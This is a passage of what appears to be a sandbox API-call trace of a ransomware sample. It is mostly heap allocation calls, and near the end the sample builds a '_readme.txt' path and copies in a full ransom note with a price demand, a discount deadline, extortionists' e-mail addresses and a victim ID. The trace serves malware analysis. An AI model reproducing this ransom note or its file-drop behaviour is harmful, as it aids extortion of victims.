returned 1 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.543] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.551] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0227.551] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.551] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.551] PathFindFileNameW (pszPath="") returned="" [0227.551] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.552] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.552] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.552] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.552] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0227.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.552] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0227.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.552] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is 